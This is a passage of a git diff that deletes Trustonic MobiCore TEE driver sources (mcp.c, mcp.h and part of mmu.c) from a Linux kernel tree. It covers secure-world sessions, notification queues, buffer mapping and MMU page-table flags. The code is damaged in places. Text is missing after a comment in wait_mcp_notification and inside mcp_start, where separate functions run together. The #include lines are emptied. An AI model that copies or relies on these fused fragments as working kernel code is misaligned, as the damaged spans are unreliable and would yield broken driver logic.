-- return mcp_set_sleep_mode_rq(MC_FLAG_REQ_TO_SLEEP);
--}
--
--int mcp_resume(void)
--{
-- return mcp_set_sleep_mode_rq(MC_FLAG_NO_SLEEP_REQ);
--}
--
--bool mcp_suspended(void)
--{
-- struct mcp_flags *flags = &mcp_ctx.mcp_buffer->mc_flags;
-- bool ret;
--
-- mutex_lock(&mcp_ctx.buffer_lock);
-- ret = flags->sleep_mode.ready_to_sleep & MC_STATE_READY_TO_SLEEP;
-- if (!ret) {
-- MCDRV_DBG("IDLE=%d!", flags->schedule);
-- MCDRV_DBG("Request Sleep=%d!", flags->sleep_mode.sleep_req);
-- MCDRV_DBG("Sleep Ready=%d!", flags->sleep_mode.ready_to_sleep);
-- }
--
-- mutex_unlock(&mcp_ctx.buffer_lock);
-- return ret;
--}
--
--bool mcp_get_idle_timeout(int32_t *timeout)
--{
-- uint32_t schedule;
-- bool ret;
--
-- mutex_lock(&mcp_ctx.buffer_lock);
-- schedule = mcp_ctx.mcp_buffer->mc_flags.schedule;
-- if (schedule == MC_FLAG_SCHEDULE_IDLE) {
-- if (g_ctx.f_timeout)
-- *timeout = mcp_ctx.mcp_buffer->mc_flags.timeout_ms;
-- else
-- *timeout = -1;
--
-- ret = true;
-- } else {
-- ret = false;
-- }
--
-- mutex_unlock(&mcp_ctx.buffer_lock);
-- return ret;
--}
--
--void mcp_reset_idle_timeout(void)
--{
-- mutex_lock(&mcp_ctx.buffer_lock);
-- mcp_ctx.mcp_buffer->mc_flags.timeout_ms = -1;
-- mutex_unlock(&mcp_ctx.buffer_lock);
--}
--
--static inline int wait_mcp_notification(void)
--{
-- unsigned long timeout = msecs_to_jiffies(MCP_TIMEOUT * 1000);
-- int try;
--
-- /*
-- * Total timeout is MCP_TIMEOUT * MCP_RETRIES, but we check for a crash
-- * to try and terminate before then if things go wrong.
-- */
-- for (try = 1; try <= MCP_RETRIES; try++) {
-- uint32_t status;
-- int ret;
--
-- /*
-- * Wait non-interruptible to keep MCP synchronised even if caller
-- * is interrupted by signal.
-- */ -- ret = wait_for_completion_timeout(&mcp_ctx.complete, timeout); -- if (ret > 0) -- return 0; -- -- MCDRV_ERROR("No answer after %ds", MCP_TIMEOUT * try); -- -- /* If SWd halted, exit now */ -- if (!mc_fc_info(MC_EXT_INFO_ID_MCI_VERSION, &status, NULL) && -- (status == MC_STATUS_HALT)) -- break; -- } -- -- /* mcp_message; -- enum cmd_id cmd_id = cmd->cmd_header.cmd_id; -- -- mutex_lock(&mcp_ctx.queue_lock); -- if (mcp_ctx.mcp_dead) -- goto out; -- -- /* Copy message to MCP buffer */ -- memcpy(msg, cmd, sizeof(*msg)); -- -- /* Poke tbase */ -- err = mcp_notify(&mcp_ctx.mcp_session); -- if (!err) -- err = wait_mcp_notification(); -- -- if (err) -- goto out; -- -- /* Check response ID */ -- if (msg->rsp_header.rsp_id != (cmd_id | FLAG_RESPONSE)) { -- MCDRV_ERROR("MCP command got invalid response (0x%X)", -- msg->rsp_header.rsp_id); -- err = -EBADE; -- goto out; -- } -- -- /* Convert result */ -- switch (msg->rsp_header.result) { -- case MC_MCP_RET_OK: -- err = 0; -- break; -- case MC_MCP_RET_ERR_CLOSE_TASK_FAILED: -- case MC_MCP_RET_ERR_NO_MORE_SESSIONS: -- err = -EBUSY; -- break; -- case MC_MCP_RET_ERR_OUT_OF_RESOURCES: -- err = -ENOSPC; -- break; -- case MC_MCP_RET_ERR_UNKNOWN_UUID: -- err = -ENOENT; -- break; -- case MC_MCP_RET_ERR_WRONG_PUBLIC_KEY: -- err = -EKEYREJECTED; -- break; -- case MC_MCP_RET_ERR_SERVICE_BLOCKED: -- err = -ECONNREFUSED; -- break; -- case MC_MCP_RET_ERR_SERVICE_LOCKED: -- err = -ECONNABORTED; -- break; -- case MC_MCP_RET_ERR_SERVICE_KILLED: -- err = -ECONNRESET; -- break; -- default: -- MCDRV_ERROR("cmd %d returned %d.", cmd_id, -- msg->rsp_header.result); -- err = -EPERM; -- goto out; -- } -- -- /* Copy response back to caller struct */ -- memcpy(cmd, msg, sizeof(*cmd)); -- --out: -- mutex_unlock(&mcp_ctx.queue_lock); -- return err; --} -- --int mcp_get_version(struct mc_version_info *version_info) --{ -- union mcp_message cmd; -- int ret; -- -- memset(&cmd, 0, sizeof(cmd)); -- cmd.cmd_header.cmd_id = 
MC_MCP_CMD_GET_MOBICORE_VERSION;
-- ret = mcp_cmd(&cmd);
-- if (!ret)
-- memcpy(version_info, &cmd.rsp_get_version.version_info,
-- sizeof(*version_info));
--
-- return ret;
--}
--
--int mcp_load_token(uintptr_t data, const struct mcp_buffer_map *map)
--{
-- union mcp_message cmd;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_LOAD_TOKEN;
-- cmd.cmd_load_token.wsm_data_type = map->type;
-- cmd.cmd_load_token.adr_load_data = map->phys_addr;
-- cmd.cmd_load_token.ofs_load_data = map->offset;
-- cmd.cmd_load_token.len_load_data = map->length;
-- return mcp_cmd(&cmd);
--}
--
--int mcp_load_check(const struct tbase_object *obj,
-- const struct mcp_buffer_map *map)
--{
-- const union mclf_header *header;
-- union mcp_message cmd;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_CHECK_LOAD_TA;
-- /* Data */
-- cmd.cmd_check_load.wsm_data_type = map->type;
-- cmd.cmd_check_load.adr_load_data = map->phys_addr;
-- cmd.cmd_check_load.ofs_load_data = map->offset;
-- cmd.cmd_check_load.len_load_data = map->length;
-- /* Header */
-- header = (union mclf_header *)(obj->data + obj->header_length);
-- cmd.cmd_check_load.uuid = header->mclf_header_v2.uuid;
-- return mcp_cmd(&cmd);
--}
--
--int mcp_open_session(struct mcp_session *session,
-- const struct tbase_object *obj,
-- const struct mcp_buffer_map *map,
-- const struct mcp_buffer_map *tci_map)
--{
-- static DEFINE_MUTEX(local_mutex);
-- const union mclf_header *header;
-- union mcp_message cmd;
-- int ret;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_OPEN_SESSION;
-- /* Data */
-- cmd.cmd_open.wsm_data_type = map->type;
-- cmd.cmd_open.adr_load_data = map->phys_addr;
-- cmd.cmd_open.ofs_load_data = map->offset;
-- cmd.cmd_open.len_load_data = map->length;
-- /* Buffer */
-- if (tci_map) {
-- cmd.cmd_open.wsmtype_tci = tci_map->type;
-- cmd.cmd_open.adr_tci_buffer = tci_map->phys_addr;
-- cmd.cmd_open.ofs_tci_buffer = tci_map->offset;
--
cmd.cmd_open.len_tci_buffer = tci_map->length; -- } else { -- cmd.cmd_open.wsmtype_tci = WSM_INVALID; -- } -- /* Header */ -- header = (union mclf_header *)(obj->data + obj->header_length); -- cmd.cmd_open.uuid = header->mclf_header_v2.uuid; -- cmd.cmd_open.is_gpta = session->is_gp; -- /* Reset unexpected notification */ -- mutex_lock(&local_mutex); -- mcp_ctx.unexp_notif.session_id = SID_MCP; /* Cannot be */ -- if (!g_ctx.f_client_login) { -- memcpy(&cmd.cmd_open.tl_header, header, -- sizeof(cmd.cmd_open.tl_header)); -- } else { -- cmd.cmd_open.cmd_open_data.mclf_magic = MC_GP_CLIENT_AUTH_MAGIC; -- if (session->is_gp) -- cmd.cmd_open.cmd_open_data.identity = session->identity; -- } -- -- /* Send MCP open command */ -- ret = mcp_cmd(&cmd); -- if (!ret) { -- session->id = cmd.rsp_open.session_id; -- /* Add to list of sessions */ -- mutex_lock(&mcp_ctx.sessions_lock); -- list_add(&session->list, &mcp_ctx.sessions); -- mutex_unlock(&mcp_ctx.sessions_lock); -- /* Check for spurious notification */ -- mutex_lock(&mcp_ctx.unexp_notif_mutex); -- if (mcp_ctx.unexp_notif.session_id == session->id) { -- mutex_lock(&session->exit_code_lock); -- session->exit_code = mcp_ctx.unexp_notif.payload; -- mutex_unlock(&session->exit_code_lock); -- complete(&session->completion); -- } -- -- mutex_unlock(&mcp_ctx.unexp_notif_mutex); -- } -- -- mutex_unlock(&local_mutex); -- return ret; --} -- --/* -- * Legacy and GP TAs close differently: -- * - GP TAs always send a notification with payload, whether on close or crash -- * - Legacy TAs only send a notification with payload on crash -- * - GP TAs may take time to close, and we get -EBUSY back from mcp_cmd -- * - Legacy TAs always close when asked, unless they are driver in which case -- * they just don't close at all -- */ --int mcp_close_session(struct mcp_session *session) --{ -- union mcp_message cmd; -- int ret; -- -- /* state is either MCP_SESSION_RUNNING or MCP_SESSION_CLOSING_GP */ -- mutex_lock(&mcp_ctx.sessions_lock); -- if 
(session->state == MCP_SESSION_RUNNING)
-- session->state = MCP_SESSION_CLOSE_PREPARE;
--
-- mutex_unlock(&mcp_ctx.sessions_lock);
-- /* Signal an eventual waiter that SWd session is going away */
-- complete(&session->completion);
-- /* Send MCP command */
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_CLOSE_SESSION;
-- cmd.cmd_close.session_id = session->id;
-- ret = mcp_cmd(&cmd);
-- mutex_lock(&mcp_ctx.sessions_lock);
-- /*
-- * The GP TA may already have sent its exit code, in which case the
-- * state has also been changed to MCP_SESSION_CLOSE_NOTIFIED.
-- */
-- if (!ret) {
-- session->state = MCP_SESSION_CLOSED;
-- list_del(&session->list);
-- mutex_lock(&mcp_ctx.notifications_mutex);
-- list_del(&session->notifications_list);
-- mutex_unlock(&mcp_ctx.notifications_mutex);
-- } else if (ret == -EBUSY) {
-- if (session->state == MCP_SESSION_CLOSE_NOTIFIED)
-- /* GP TA already closed */
-- schedule_work(&session->close_work);
--
-- session->state = MCP_SESSION_CLOSING_GP;
-- } else {
-- /* Something is not right, assume session is still running */
-- session->state = MCP_SESSION_RUNNING;
-- }
--
-- mutex_unlock(&mcp_ctx.sessions_lock);
-- return ret;
--}
--
--int mcp_map(uint32_t session_id, struct mcp_buffer_map *map)
--{
-- union mcp_message cmd;
-- int ret;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_MAP;
-- cmd.cmd_map.session_id = session_id;
-- cmd.cmd_map.wsm_type = map->type;
-- cmd.cmd_map.adr_buffer = map->phys_addr;
-- cmd.cmd_map.ofs_buffer = map->offset;
-- cmd.cmd_map.len_buffer = map->length;
-- ret = mcp_cmd(&cmd);
-- if (!ret)
-- map->secure_va = cmd.rsp_map.secure_va;
--
-- return ret;
--}
--
--int mcp_unmap(uint32_t session_id, const struct mcp_buffer_map *map)
--{
-- union mcp_message cmd;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_UNMAP;
-- cmd.cmd_unmap.session_id = session_id;
-- cmd.cmd_unmap.wsm_type = map->type;
-- cmd.cmd_unmap.virtual_buffer_len =
map->length;
-- cmd.cmd_unmap.secure_va = map->secure_va;
-- return mcp_cmd(&cmd);
--}
--
--int mcp_multimap(uint32_t session_id, struct mcp_buffer_map *maps)
--{
-- struct mcp_buffer_map *map = maps;
-- union mcp_message cmd;
-- struct buffer_map *buf = cmd.cmd_multimap.bufs;
-- int ret = 0;
-- uint32_t i;
--
-- /* Prepare command */
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_MULTIMAP;
-- cmd.cmd_multimap.session_id = session_id;
-- for (i = 0; i < MC_MAP_MAX; i++, map++, buf++) {
-- buf->wsm_type = map->type;
-- buf->adr_buffer = map->phys_addr;
-- buf->ofs_buffer = map->offset;
-- buf->len_buffer = map->length;
-- }
--
-- ret = mcp_cmd(&cmd);
-- if (ret)
-- return ret;
--
-- /* Return secure virtual addresses */
-- map = maps;
-- for (i = 0; i < MC_MAP_MAX; i++, map++)
-- map->secure_va = cmd.rsp_multimap.secure_va[i];
--
-- return 0;
--}
--
--int mcp_multiunmap(uint32_t session_id, const struct mcp_buffer_map *maps)
--{
-- const struct mcp_buffer_map *map = maps;
-- union mcp_message cmd;
-- struct buffer_unmap *buf = cmd.cmd_multiunmap.bufs;
-- uint32_t i;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_MULTIUNMAP;
-- cmd.cmd_multiunmap.session_id = session_id;
-- for (i = 0; i < MC_MAP_MAX; i++, map++, buf++) {
-- buf->secure_va = map->secure_va;
-- buf->len_buffer = map->length;
-- }
--
-- return mcp_cmd(&cmd);
--}
--
--static int mcp_close(void)
--{
-- union mcp_message cmd;
--
-- memset(&cmd, 0, sizeof(cmd));
-- cmd.cmd_header.cmd_id = MC_MCP_CMD_CLOSE_MCP;
-- return mcp_cmd(&cmd);
--}
--
--static inline bool notif_queue_full(void)
--{
-- struct notification_queue *tx = mcp_ctx.nq.tx;
--
-- return (tx->hdr.write_cnt - tx->hdr.read_cnt) == tx->hdr.queue_size;
--}
--
--static inline void notif_queue_push(uint32_t session_id)
--{
-- struct notification_queue_header *hdr = &mcp_ctx.nq.tx->hdr;
-- uint32_t i = hdr->write_cnt % hdr->queue_size;
--
-- mcp_ctx.nq.tx->notification[i].session_id = session_id;
--
mcp_ctx.nq.tx->notification[i].payload = 0;
-- hdr->write_cnt++;
--}
--
--static inline bool mcp_notifications_flush_nolock(void)
--{
-- bool flushed = false;
--
-- while (!list_empty(&mcp_ctx.notifications) && !notif_queue_full()) {
-- struct mcp_session *session;
--
-- session = list_first_entry(&mcp_ctx.notifications,
-- struct mcp_session,
-- notifications_list);
-- dev_dbg(g_ctx.mcd, "pop %x\n", session->id);
-- notif_queue_push(session->id);
-- list_del_init(&session->notifications_list);
-- flushed = true;
-- }
--
-- return flushed;
--}
--
--bool mcp_notifications_flush(void)
--{
-- bool flushed = false;
--
-- mutex_lock(&mcp_ctx.notifications_mutex);
-- flushed = mcp_notifications_flush_nolock();
-- mutex_unlock(&mcp_ctx.notifications_mutex);
-- return flushed;
--}
--
--int mcp_notify(struct mcp_session *session)
--{
-- int ret = 0;
--
-- if (!mcp_ctx.scheduler_cb)
-- return -EAGAIN;
--
-- mutex_lock(&mcp_ctx.notifications_mutex);
-- if (session->id == SID_MCP)
-- dev_dbg(g_ctx.mcd, "notify MCP");
-- else
-- dev_dbg(g_ctx.mcd, "notify %x", session->id);
--
-- /* Notify TEE */
-- if (!list_empty(&mcp_ctx.notifications) || notif_queue_full()) {
-- if (!list_empty(&session->notifications_list)) {
-- ret = -EAGAIN;
-- dev_dbg(g_ctx.mcd, "skip %x\n", session->id);
-- } else {
-- list_add(&session->notifications_list,
-- &mcp_ctx.notifications);
-- dev_dbg(g_ctx.mcd, "push %x\n", session->id);
-- }
--
-- mcp_notifications_flush_nolock();
--
-- if (mcp_ctx.scheduler_cb(MCP_YIELD)) {
-- MCDRV_ERROR("MC_SMC_N_YIELD failed");
-- ret = -EPROTO;
-- }
-- } else {
-- notif_queue_push(session->id);
-- if (mcp_ctx.scheduler_cb(MCP_NSIQ)) {
-- MCDRV_ERROR("MC_SMC_N_SIQ failed");
-- ret = -EPROTO;
-- }
-- }
--
-- mutex_unlock(&mcp_ctx.notifications_mutex);
-- return ret;
--}
--
--static inline void handle_mcp_notif(uint32_t exit_code)
--{
-- dev_dbg(g_ctx.mcd, "notification from MCP ec %d\n", exit_code);
-- complete(&mcp_ctx.complete);
--}
--
--static inline void
handle_session_notif(uint32_t session_id, uint32_t exit_code) --{ -- struct mcp_session *session = NULL, *s; -- -- dev_dbg(g_ctx.mcd, "notification from %x ec %d\n", session_id, -- exit_code); -- mutex_lock(&mcp_ctx.sessions_lock); -- list_for_each_entry(s, &mcp_ctx.sessions, list) { -- if (s->id == session_id) { -- session = s; -- break; -- } -- } -- -- if (session) { -- /* TA has terminated */ -- if (exit_code) { -- /* Update exit code, or not */ -- mutex_lock(&session->exit_code_lock); -- /* -- * In GP, the only way to recover the sessions exit code -- * is to call TEEC_InvokeCommand which will notify. But -- * notifying a dead session would change the exit code -- * to ERR_SID_NOT_ACTIVE, hence the check below. -- */ -- if (!session->is_gp || !session->exit_code || -- (exit_code != ERR_SID_NOT_ACTIVE)) -- session->exit_code = exit_code; -- -- mutex_unlock(&session->exit_code_lock); -- -- /* Update state or schedule close worker */ -- if (session->state == MCP_SESSION_CLOSE_PREPARE) -- session->state = MCP_SESSION_CLOSE_NOTIFIED; -- else if (session->state == MCP_SESSION_CLOSING_GP) -- schedule_work(&session->close_work); -- } -- -- /* Unblock waiter */ -- complete(&session->completion); -- } -- mutex_unlock(&mcp_ctx.sessions_lock); -- -- /* Unknown session, probably being started */ -- if (!session) { -- mutex_lock(&mcp_ctx.unexp_notif_mutex); -- mcp_ctx.unexp_notif.session_id = session_id; -- mcp_ctx.unexp_notif.payload = exit_code; -- mutex_unlock(&mcp_ctx.unexp_notif_mutex); -- } --} -- --static void mc_irq_worker(struct work_struct *data) --{ -- struct notification_queue *rx = mcp_ctx.nq.rx; -- -- /* Deal with all pending notifications in one go */ -- while ((rx->hdr.write_cnt - rx->hdr.read_cnt) > 0) { -- struct notification nf; -- -- nf = rx->notification[rx->hdr.read_cnt++ % rx->hdr.queue_size]; -- if (nf.session_id == SID_MCP) -- handle_mcp_notif(nf.payload); -- else -- handle_session_notif(nf.session_id, nf.payload); -- } -- -- /* -- * Finished 
processing notifications. It does not matter whether -- * there actually were any notification or not. S-SIQs can also -- * be triggered by an SWd driver which was waiting for a FIQ. -- * In this case the S-SIQ tells NWd that SWd is no longer idle -- * an will need scheduling again. -- */ -- if (mcp_ctx.scheduler_cb) -- mcp_ctx.scheduler_cb(MCP_NSIQ); --} -- --/* -- * This function represents the interrupt function of the mcDrvModule. -- * It signals by incrementing of an event counter and the start of the read -- * waiting queue, the read function a interrupt has occurred. -- */ --static irqreturn_t irq_handler(int intr, void *arg) --{ -- /* wake up thread to continue handling this interrupt */ -- schedule_work(&irq_work); -- return IRQ_HANDLED; --} -- --void mcp_register_scheduler(int (*scheduler_cb)(enum mcp_scheduler_commands)) --{ -- mcp_ctx.scheduler_cb = scheduler_cb; --} -- --void mcp_register_crashhandler(void (*crashhandler_cb)(void)) --{ -- mcp_ctx.crashhandler_cb = crashhandler_cb; --} -- --int mcp_start(void) --{ -- size_t q_len = ALIGN(2 * (sizeof(struct notification_queue_header) + -- NQ_NUM_ELEMS * sizeof(struct notification)), 4); -- int ret; -- -- /* Make sure we have an interrupt number before going on */ --#if defined(CONFIG_OF) -- mcp_ctx.irq = irq_of_parse_and_map(g_ctx.mcd->of_node, 0); --#endif --#if defined(MC_INTR_SSIQ) -- if (mcp_ctx.irq <= 0) -- mcp_ctx.irq = MC_INTR_SSIQ; --#endif -- -- if (mcp_ctx.irq <= 0) { -- MCDRV_ERROR("No IRQ number, aborting"); -- return -EINVAL; -- } -- -- /* Call the INIT fastcall to setup shared buffers */ -- ret = mc_fc_init(virt_to_phys(mcp_ctx.base), -- (uintptr_t)mcp_ctx.mcp_buffer - -- (uintptr_t)mcp_ctx.base, -- q_len, sizeof(*mcp_ctx.mcp_buffer)); -- if (ret) -- return ret; -- -- /* First empty N-SIQ to setup of the MCI structure */ -- ret = mc_fc_nsiq(); -- if (ret) -- return ret; -- -- /* -- * Wait until (uint16_t)-1) { -- MCDRV_DBG_WARN("queues too large (more than 64k), sorry..."); -- return 
-EINVAL; -- } -- -- mcp_ctx.order = get_order(q_len + sizeof(*mcp_ctx.mcp_buffer)); -- mci = __get_free_pages(GFP_USER | __GFP_ZERO, mcp_ctx.order); -- if (!mci) -- return -ENOMEM; -- -- mcp_ctx.nq.tx = (struct notification_queue *)mci; -- mcp_ctx.nq.tx->hdr.queue_size = NQ_NUM_ELEMS; -- mci += sizeof(struct notification_queue_header) + -- mcp_ctx.nq.tx->hdr.queue_size * sizeof(struct notification); -- -- mcp_ctx.nq.rx = (struct notification_queue *)mci; -- mcp_ctx.nq.rx->hdr.queue_size = NQ_NUM_ELEMS; -- mci += sizeof(struct notification_queue_header) + -- mcp_ctx.nq.rx->hdr.queue_size * sizeof(struct notification); -- -- mcp_ctx.mcp_buffer = (void *)ALIGN(mci, 4); -- return 0; --} -- --void mcp_exit(void) --{ -- mark_mcp_dead(); -- if (mcp_ctx.dump.off) -- kfree(mcp_ctx.dump.buf); -- -- free_pages((unsigned long)mcp_ctx.base, mcp_ctx.order); --} -diff --git a/drivers/gud/MobiCoreDriver/mcp.h b/drivers/gud/MobiCoreDriver/mcp.h -deleted file mode 100644 -index 0eefe573de8bf..0000000000000 ---- a/drivers/gud/MobiCoreDriver/mcp.h -+++ /dev/null -@@ -1,121 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */
--
--#ifndef _MC_MCP_H_
--#define _MC_MCP_H_
--
--#include "mci/mcloadformat.h" /* struct identity */
--
--/* Structure to hold the TA/driver descriptor to pass to MCP */
--struct tbase_object {
-- uint32_t length; /* Total length */
-- uint32_t header_length; /* Length of header before payload */
-- uint8_t data[]; /* Header followed by payload */
--};
--
--/* Structure to hold all mapped buffer data to pass to MCP */
--struct mcp_buffer_map {
-- uint64_t phys_addr; /** Page-aligned physical address */
-- uint64_t secure_va; /** Page-aligned physical address */
-- uint32_t offset; /** Data offset inside the first page */
-- uint32_t length; /** Length of the data */
-- uint32_t type; /** Type of MMU */
--};
--
--struct mcp_session {
-- /* Work descriptor to handle delayed closing, set by upper layer */
-- struct work_struct close_work;
-- /* Sessions list (protected by mcp sessions_lock) */
-- struct list_head list;
-- /* Notifications list (protected by mcp notifications_mutex) */
-- struct list_head notifications_list;
-- /* Notification waiter lock */
-- struct mutex notif_wait_lock; /* Only one at a time */
-- /* Notification received */
-- struct completion completion;
-- /* Notification lock */
-- struct mutex exit_code_lock;
-- /* Last notification */
-- int32_t exit_code;
-- /* Session id */
-- uint32_t id;
-- /* Session state (protected by mcp sessions_lock) */
-- enum mcp_session_state {
-- MCP_SESSION_RUNNING,
-- MCP_SESSION_CLOSE_PREPARE,
-- MCP_SESSION_CLOSE_NOTIFIED,
-- MCP_SESSION_CLOSING_GP,
-- MCP_SESSION_CLOSED,
-- } state;
-- /* This TA is of Global Platform type, set by upper layer */
-- bool is_gp;
-- /* GP TAs have login information */
-- struct identity identity;
--};
--
--/* Init for the mcp_session structure */
--void mcp_session_init(struct mcp_session *session, bool is_gp,
-- const struct identity *identity);
--int mcp_session_waitnotif(struct mcp_session *session, int32_t timeout);
--int32_t mcp_session_exitcode(struct mcp_session
*mcp_session);
--
--/* SWd suspend/resume */
--int mcp_suspend(void);
--int mcp_resume(void);
--bool mcp_suspended(void);
--
--/* Callback to scheduler registration */
--enum mcp_scheduler_commands {
-- MCP_YIELD,
-- MCP_NSIQ,
--};
--
--void mcp_register_scheduler(int (*scheduler_cb)(enum mcp_scheduler_commands));
--bool mcp_notifications_flush(void);
--void mcp_register_crashhandler(void (*crashhandler_cb)(void));
--
--/*
-- * Get the requested SWd sleep timeout value (ms)
-- * - if the timeout is -1, wait indefinitely
-- * - if the timeout is 0, re-schedule immediately (timeouts in µs in the SWd)
-- * - otherwise sleep for the required time
-- * returns true if sleep is required, false otherwise
-- */
--bool mcp_get_idle_timeout(int32_t *timeout);
--void mcp_reset_idle_timeout(void);
--
--/* MCP commands */
--int mcp_get_version(struct mc_version_info *version_info);
--int mcp_load_token(uintptr_t data, const struct mcp_buffer_map *buffer_map);
--int mcp_load_check(const struct tbase_object *obj,
-- const struct mcp_buffer_map *buffer_map);
--int mcp_open_session(struct mcp_session *session,
-- const struct tbase_object *obj,
-- const struct mcp_buffer_map *map,
-- const struct mcp_buffer_map *tci_map);
--int mcp_close_session(struct mcp_session *session);
--int mcp_map(uint32_t session_id, struct mcp_buffer_map *buffer_map);
--int mcp_unmap(uint32_t session_id, const struct mcp_buffer_map *buffer_map);
--int mcp_multimap(uint32_t session_id, struct mcp_buffer_map *buffer_maps);
--int mcp_multiunmap(uint32_t session_id,
-- const struct mcp_buffer_map *buffer_maps);
--int mcp_notify(struct mcp_session *mcp_session);
--
--/* MCP initialisation/cleanup */
--int mcp_init(void);
--void mcp_exit(void);
--int mcp_start(void);
--void mcp_stop(void);
--
--#endif /* _MC_MCP_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mmu.c b/drivers/gud/MobiCoreDriver/mmu.c
-deleted file mode 100644
-index fc769be4d15db..0000000000000
---- a/drivers/gud/MobiCoreDriver/mmu.c
-+++
/dev/null -@@ -1,450 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#include "public/mc_linux.h" -- --#include "mci/mcimcp.h" -- --#include "platform.h" /* CONFIG_TRUSTONIC_TEE_LPAE */ --#include "main.h" --#include "debug.h" --#include "mcp.h" /* mcp_buffer_map */ --#include "mmu.h" -- --#ifdef CONFIG_TRUSTONIC_TEE_LPAE --#define MMU_TYPE_PAGE (3 << 0) --#define MMU_BUFFERABLE BIT(2) /* AttrIndx[0] */ --#define MMU_CACHEABLE BIT(3) /* AttrIndx[1] */ --#define MMU_NS BIT(5) --#define MMU_AP_RW_ALL BIT(6) /* AP[2:1], RW, at any privilege level */ --#define MMU_EXT_SHARED (3 << 8) /* SH[1:0], inner shareable */ --#define MMU_EXT_AF BIT(10) /* Access Flag */ --#define MMU_EXT_NG BIT(11) --#define MMU_EXT_XN (((uint64_t)1) << 54) /* XN */ --#else --#define MMU_TYPE_EXT (3 << 0) /* v5 */ --#define MMU_TYPE_SMALL (2 << 0) --#define MMU_BUFFERABLE BIT(2) --#define MMU_CACHEABLE BIT(3) --#define MMU_EXT_AP0 BIT(4) --#define MMU_EXT_AP1 (2 << 4) --#define MMU_EXT_TEX(x) ((x) << 6) /* v5 */ --#define MMU_EXT_SHARED BIT(10) /* v6 */ --#define MMU_EXT_NG BIT(11) /* v6 */ --#endif -- --/* -- * MobiCore specific page tables for world shared memory. -- * Linux uses shadow page tables, see arch/arm/include/asm/pgtable-2level. -- * MobiCore uses the default ARM format. -- * -- * Number of page table entries in one L2 MMU table. 
This is ARM specific, an -- * MMU table covers 1 MiB by using 256 entries referring to 4KiB pages each. -- */ --#define L2_ENTRIES_MAX 256 -- --/* -- * Small buffers (below 1MiB) are mapped using the legacy L2 table, but bigger -- * buffers now use a fake L1 table that holds 64-bit pointers to L2 tables. As -- * this must be exactly one page, we can hold up to 512 entries. -- */ --#define L1_ENTRIES_MAX 512 -- --#ifdef CONFIG_TRUSTONIC_TEE_LPAE -- --/* -- * Secure world uses 64-bit physical addresses -- */ --typedef u64 tbase_pte_t; -- --/* -- * Linux uses different mappings for SMP systems(the sharing flag is set for -- * the pte. In order not to confuse things too much in Mobicore make sure the -- * shared buffers have the same flags. This should also be done in SWD side. -- */ --static tbase_pte_t pte_flags = MMU_BUFFERABLE | MMU_CACHEABLE | MMU_EXT_NG | --#ifdef CONFIG_SMP -- MMU_EXT_SHARED | --#endif /* CONFIG_SMP */ -- MMU_EXT_XN | MMU_EXT_AF | MMU_AP_RW_ALL | -- MMU_NS | MMU_TYPE_PAGE; -- --#else /* CONFIG_TRUSTONIC_TEE_LPAE */ -- --/* -- * Secure world uses 32-bit physical addresses -- */ --typedef u32 tbase_pte_t; -- --/* -- * Linux uses different mappings for SMP systems(the sharing flag is set for -- * the pte. In order not to confuse things too much in Mobicore make sure the -- * shared buffers have the same flags. This should also be done in SWD side. -- */ --static tbase_pte_t pte_flags = MMU_BUFFERABLE | MMU_CACHEABLE | MMU_EXT_NG | --#ifdef CONFIG_SMP -- MMU_EXT_SHARED | MMU_EXT_TEX(1) | --#endif /* CONFIG_SMP */ -- MMU_EXT_AP1 | MMU_EXT_AP0 | -- MMU_TYPE_SMALL | MMU_TYPE_EXT; -- --#endif /* !CONFIG_TRUSTONIC_TEE_LPAE */ -- --/* -- * Fake L1 MMU table. -- */ --union l1_table { -- u64 *pages_phys; /* Array of physical page addresses */ -- unsigned long page; --}; -- --/* -- * L2 MMU table, which is more a L3 table in the LPAE case. 
-- */
--union l2_table {
-- tbase_pte_t *ptes; /* Array of PTEs */
-- unsigned long page;
--};
--
--/*
-- * MMU table allocated to the Daemon or a TLC describing a world shared
-- * buffer.
-- * When users map a malloc()ed area into SWd, a MMU table is allocated.
-- * In addition, the area of maximum 1MB virtual address space is mapped into
-- * the MMU table and a handle for this table is returned to the user.
-- */
--struct tbase_mmu {
-- union l2_table l2_tables[L1_ENTRIES_MAX]; /* L2 tables */
-- size_t l2_tables_nr; /* Actual number of L2 tables */
-- union l1_table l1_table; /* Fake L1 table */
-- union l2_table l1_l2_table; /* L2 table for the L1 table */
-- uint32_t offset;
-- uint32_t length;
-- bool user; /* Pages are from user space */
--};
--
--static void free_all_pages(struct tbase_mmu *mmu_table)
--{
-- union l2_table *l2_table = &mmu_table->l2_tables[0];
-- size_t i;
--
-- for (i = 0; i < mmu_table->l2_tables_nr; i++, l2_table++) {
-- if (!l2_table->page)
-- break;
--
-- free_page(l2_table->page);
-- }
--
-- if (mmu_table->l1_l2_table.page)
-- free_page(mmu_table->l1_l2_table.page);
--
